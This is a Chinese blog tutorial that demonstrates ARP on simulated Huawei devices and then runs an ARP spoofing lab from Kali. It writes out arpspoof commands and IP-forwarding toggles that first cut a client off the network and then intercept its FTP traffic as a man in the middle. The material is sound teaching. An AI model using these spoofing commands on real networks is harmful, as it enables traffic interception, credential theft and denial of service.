ARP协议华为设备演示

已于 2023-07-12 23:36:54 修改
阅读量656 收藏 6
点赞数 1
分类专栏: 网络安全 文章标签: 网络 运维 网络协议 安全
于 2023-03-29 16:58:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46008548/article/details/129839193
版权

ARP协议的作用是将IP地址,解析成MAC地址

  • ARP协议 数据通信过程

实验拓扑

ARP的报文类型:

ARP的请求包 请求目标主机的MAC地址,会把目标MAC地址封装为 全F---> 广播报文

ARP的回复报文 明确目标主机的MAC地址,单播报文

什么时候会触发ARP请求?

计算机在封装数据帧的 目标MAC地址 要查询 ARP缓存表,如果缓存表中没有IP地址和MAC地址的对应关系,就会触发ARP请求

实验配置

  • 在交换机LSW1上GE0/0/1接口进行抓包

  • PC1 ping PC2

因为PC1没有ARP缓存表,所以触发了ARP请求,目标MAC地址封装为 全F---> 广播报文

  • 在wireshark中查看

ARP请求包

ARP回复报文

  • 查看PC2的ARP缓存表:

PC>arp -a

 Internet Address    Physical Address    Type
192.168.1.1         54-89-98-81-5A-2F   dynamic

dynamic表示是通过ARP报文动态学习的MAC地址

  • ARP协议不能跨广播域工作,不能跨网段工作。
  • ARP也会有其他的类型报文
    • 代理ARP: 代理访问目标IP的ARP请求包做回复
    • 无故ARP/免费ARP

自己问自己的一种ARP报文, 在DHCP协议中,为了检测是否会发生IP地址冲突

  • 反向ARP(RARP): 通过MAC地址 获得IP地址

ARP欺骗之断网攻击:

  • 使用cloud接入kali

在cloud中创建端口接入kali,我使用的kali是vmware中的虚拟机,使用的虚拟网卡是VMware8,所以一个端口是UDP一个是VMware8进行端口映射

  • kali关闭数据转发模式

echo 0 >>/proc/sys/net/ipv4/ip_forward 

cat /proc/sys/net/ipv4/ip_forward 
0

  • 开启ARP欺骗

arpspoof -i eth0 -t 192.168.93.11 192.168.63.12

-i : 选择网络接口   -t : 选择 攻击者  后面的IP地址:要伪装成谁

client此时无法登录server

ARP欺骗实验(中间人攻击实验)

  • 关闭数据转发模式

echo 1 >>/proc/sys/net/ipv4/ip_forward 

cat /proc/sys/net/ipv4/ip_forward
1

  • 开启ARP欺骗

#两边都要进行欺骗

arpspoof -i eth0 -t 192.168.93.11 192.168.63.12
arpspoof -i eth0 -t 192.168.93.12 192.168.63.11

  • client登录ftp server服务器

可以登录,但是双方的数据都经过了kali

在kali上打开wireshark,可以抓到ftp的数据包进行解析

YanYue_zh
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
华为网络学习笔记(二) ARP协议
weixin_45377193的博客
06-18 718
标题
华为HCNA之ARP和Proxy ARP实验
qq_37176318的博客
06-12 1622
导语: ARP是用来将IP地址转换成MAC地址的协议 拓扑图: 步骤: 1.基础配置 如拓扑图所示,完成实验的各个物理设备和接口的配置 接下来查看主机的ARP表: PC>arp -a Internet Address Physical Address Type 可以看到,主机的ARP表为空; 接下来查看R1的ARP表: [R1]display arp all IP ADDRESS MAC ADDRESS EXPIRE(M) TYPE INTERFA
华为设备 ARP协议(地址解析协议
zhdf160916的博客
10-16 589
一、ARP(地址解析)协议 是根据IP地址获取物理地址的TCP/IP协议 Hardware Type(硬件类型):表示使用哪种技术 通常为 1 (以太网技术) Protocol Type (协议类型):IP协议(IPX协议……) Hardware Length(硬件(MAC)地址的长度):6(68=48) Protocol Length(协议的长度):4(48=32) Operation Code(操作码):ARP请求报文/应答报文 Source Hardware Address(源硬件(MAC)地
华为配置路由式Proxy ARP示例
最新发布
专研计算机网络,数据通信,网络安全,系统集成
04-16 1482
企业内部进行子网划分时,可能会出现两个子网网络属于同一网段,但是却不属于同一物理网络的情况,两个子网网络间被交换机分隔。这时可以通过修改网络内主机的路由信息,使发往其它子网的数据先发送到连接不同子网的网关设备上,再由网关设备转发此数据报文。但是这种解决方案需要配置子网中所有主机的路由,并不便于管理和维护。在网关上部署路由式Proxy ARP功能,可以有效解决子网划分带来的管理和维护方面的问题。
ARP代理
安子自语
09-09 2366
http://baike.baidu.com/view/547486.htm?fr=aladdin  ip proxy-arp  ip local-proxy-arp clear arp-cache all Proxy-ARP代理ARP,以网关自身的MAC回应客户端对不同网段IP地址的ARP请求,用于客户机网关设置为其它网段IP或自身IP时,能与其它网段通信。 Loca
代理ARP小实验
qq_45491497的博客
10-16 461
搭建拓扑如下 PC1,PC2均使用路由器改变symbol来模拟 一、关闭PC1/2的路由功能,当作纯电脑 PC1的MAC R1两接口的MAC PC2的MAC 当PC1与PC2进行通信后,查看arp表,获得的MAC为R1左边接口的MAC地址 代理arp实现 二、回归路由状态 使用静态路由让其互联互通 1.使用出接口的方式(是代理ARP,请求的是不同网段) 、 清除PC1arp表的缓存 重新ping,查看arp表依旧是R1左接口的mac 代理a
华为实战详解——代理ARP.doc
05-09
华为实战详解——代理ARP 本文档详细解释了代理ARP(Proxy ARP)的概念、工作机制、应用场景和优点。代理ARP是一种技术,可以使得不在同一物理网络上的主机之间实现通信。代理ARP可以屏蔽分离的物理网络这一事实,...
华为培训课件:HC110110005 ARP协议.ppt
09-20
华为培训课件:HC110110005 ARP协议.ppt
华为S9300ARP防护策略
03-17
S9300_网络安全介绍及攻击特性介绍,详细介绍了华为S9300系列交换机的ARP防护配置介绍和命令,帮助华为用户解决由于ARP导致的种种故障。
华为交换机ARP表采集Perl脚本
02-05
一个采集华为交换机ARP表并保存到Excel中的脚本。已经测试过93,35等交换机。
华为HCIA学习笔记:ARP协议
君逍遥o
06-15 235
网络设备有数据要发送给另一台网络设备时,必须要知道对方的网络层地址(即IP地址)。IP地址由网络层来提供,但是仅有IP地址是不够的,IP数据报文必须封装成帧才能通过数据链路进行发送。数据帧必须要包含目的MAC地址,因此发送端还必须获职到目的MAC地址。通过目的IP地址来获取目的MAC地址的过程是由ARP(Address Resolution Protocol)协议来实现的。
华为ARP代理的三种方式
tushanpeipei的博客
12-13 1万+
注:使用华为设备 路由式arp: 使用场景: 路由器或者交换机三层转发的情况下 原理: 也就是普通的arp代理,当PC1没有网关时去ping不是同一网段的设备(直接封装目的IP的请求报文),到达了最近的路由器时,因为为广播帧,路由器会拆包查看,一般情况下请求的IP地址不是自己的,不会处理,但是开启了的路由的arp代理后,如果发现目的IP地址是自己有相应的路由表,并且出接口不是原来的接口,这时就会按照路由表项路由表的出接口请求ARP地址(如果是直连,直接请求,如果不是直连,请求下一跳),然后会将自己的ARP
华为s5700交换机代理ARP功能配置
weixin_34342905的博客
01-18 3408
拓扑图如下配置如下:#sysname Huawei#undo info-center enable#vlan batch 10 20#interface Vlanif1#interface Vlanif10ip address 10.0.1.1 255.255.255.0arp-proxy enable #开启arp代理#interface Vlanif20ip ad...
华为实验1---理解ARP和Proxy ARP
yychentracy的博客
09-27 1840
原理概述 ARP是将一个IP地址映射到正确的MAC地址,ARP分为动态和静态两种,动态是利用ARP广播报文,动态执行并自动进行IP地址到以太网MAC地址的解析,无需网络管理员手工处理,静态ARP是建立IP地址和MAC地址之间的映射关系,在主机上不能动态调整此映射关系,需要网络管理员手动添加。 proxy ARP 代理ARP,ARP请求从一个主机发出,用于解析处于同一逻辑却不在同一物理网段上的另一台主机时,连接他的巨有代理ARP功能的设备可以应答该要求,使得处于不同物理网段的主机可以正常地进行通信 实验目的
华为交换机常见ARP操作
Tony_long7483的博客
10-26 1万+
查看ARP表项 display arp network 172.16.0.0 16 刷新ARP表项:先清除设备上的ARP表项,这样设备会重新学习ARP表项 reset arp all reset arp static [HUAWEI] undo arp static 172.16.20.1 0023-0045-0067 interface gigabitethernet 1/0/1 reset arp interface vlanif 100 ip 172.16.20.1 //如果不指定IP地址,则.
ARP请求的详细过程
热门推荐
qq_38902271的博客
11-27 1万+
简介: 地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。 流程举例 测试仪的两个端口可以模拟不同的设备(Devices)。 过程:A ping D A的IP与子网掩码相与,得到的网段是10.1.1.0;D的IP和子网掩码相与得到的网段是10.1.2.0,发现不在同一网段。则需要跨网关请求。 第一步: A广播请求网关B的MAC,目的是将数据发送到网关。B收到ARP请求后将A的MAC和IP记录到ARP
eNSP ARP配置及代理ARP实验 问题的分析及解决
qq_40392934的博客
06-19 1万+
ARP配置及代理ARP实验基础实验内容ARP 表项观察ARP代理配置 基础 工具:eNSP VirtualBox 实验内容 ARP 表项观察 进行如图物理连接并进行配置后,测试两PC到路由器的连通性(ping) 输入命令:arp -a(PC)、 dis arp all® 查看PC和路由器的ARP表项,最好建立表格(如下)进行记录,方便之后的实验 设备名称 接口 IP地址 MAC地址...
两个路由器之间静态ARP代理ARP配置
﹎厡.唻
11-16 1万+
静态ARP表项:可以手工配置和维护,不会老化,也不会被动态ARP表项覆盖。 实验一:配置静态 (1)进入系统视图 sys (2)手工添加静态ARP表项      arp static {ip mac} [vlan-id int type int-num] 若是短静态ARP表项,只需给出IP和Mac地址;长静态则需给出vlan-id号,接口类型和接口号。 实验二:配置代理: (1)进入
华为交换机set arp绑定命令
06-08
华为交换机上,可以使用以下命令来进行ARP绑定: ``` arp static 地址> 地址> ...需要注意的是,在华为交换机上进行ARP绑定时,不需要指定ARP协议类型,因为华为交换机默认使用ARP协议进行地址解析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值